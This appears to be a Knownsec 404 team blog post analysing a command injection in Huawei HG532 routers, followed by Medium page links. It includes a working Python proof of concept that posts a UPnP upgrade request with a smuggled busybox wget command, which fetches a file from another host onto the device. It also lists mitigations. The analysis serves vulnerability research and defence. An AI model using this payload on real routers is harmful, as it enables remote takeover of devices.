Huawei HG532 Series Router Remote Command Execution Analyzation

Background

Vulnerability Analyzation

snprintf($s0, 0x400, 'upg -g -U %s -t '1 Firmware Upgrade Image' -c upnp -r %s -d -', NewDownloadURL, NewStatusURL)system($s0)
import requestsheaders = {
"Authorization": "Digest username=dslf-config, realm=HuaweiHomeGateway, nonce=88645cefb1f9ede0e336e3569d75ee30, uri=/ctrlt/DeviceUpgrade_1, response=3612f843a42db38f48f59d2a3597e19c, algorithm=MD5, qop=auth, nc=00000001, cnonce=248d1a2560100669"
}
data = '''<?xml version="1.0" ?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">
<NewStatusURL>;/bin/busybox wget -g 192.168.1.2 -l /tmp/1 -r /1;</NewStatusURL>
<NewDownloadURL>HUAWEIUPNP</NewDownloadURL>
</u:Upgrade>
</s:Body>
</s:Envelope>
'''
requests.post('http://192.168.1.1:37215/ctrlt/DeviceUpgrade_1',headers=headers,data=data)
  • Configure the built-in firewall function.
  • Change the default password.
  • Deploy a firewall at the carrier side.

Conclusion

  1. Similar to the command injection in SetNTPServers, Broadband Routers in Ireland【3】, this vulnerability seems to be a simple concatenation of command.
  2. This vulnerability also provides a good direction for researchers when discovering vulnerabilities. Pay more attention to the code near the functions like snprintf() and system().
  3. Any variations which can access to functions are detrimental. Most RCE vulnerabilities happen with the lack of filtration, leading to the command concatenation, or without suitable control for the length of variations, causing the buffer overflow. In term of this point, equipment supplier is supposed to undertake the responsibility. It is important to develop software with security awareness.

Reference link

--

--

--

404 Team, the core team from a well-known security company Knowsec in China. Twitter:@seebug_team Youtube: @404team knownsec Email:zoomeye@knownsec.com

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

How to Participate in the MicroBuddies Genesis

Device and Account Security Checklist 2.0

Confusion Matrix and cyber security

{UPDATE} Magic Piano Tiles: Anime Music Hack Free Resources Generator

{UPDATE} Freddie Dredd Freddie's Dead Hack Free Resources Generator

Kollect Introduces Its Litepaper!

Attackers are abusing Google’s App Engine to circumvent Enterprise Security Solutions…Again!

Hi guys! Don't leave your project's #security to chance.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Knownsec 404 team

Knownsec 404 team

404 Team, the core team from a well-known security company Knowsec in China. Twitter:@seebug_team Youtube: @404team knownsec Email:zoomeye@knownsec.com

More from Medium

Log4Shell & massive Kinsing deployment

Understanding Spring4Shell RCE from an engineer’s perspective (with code)

Log4Shell : JNDI Injection via Attackable Log4J

Accessing confidential files from a mobile phone in two minutes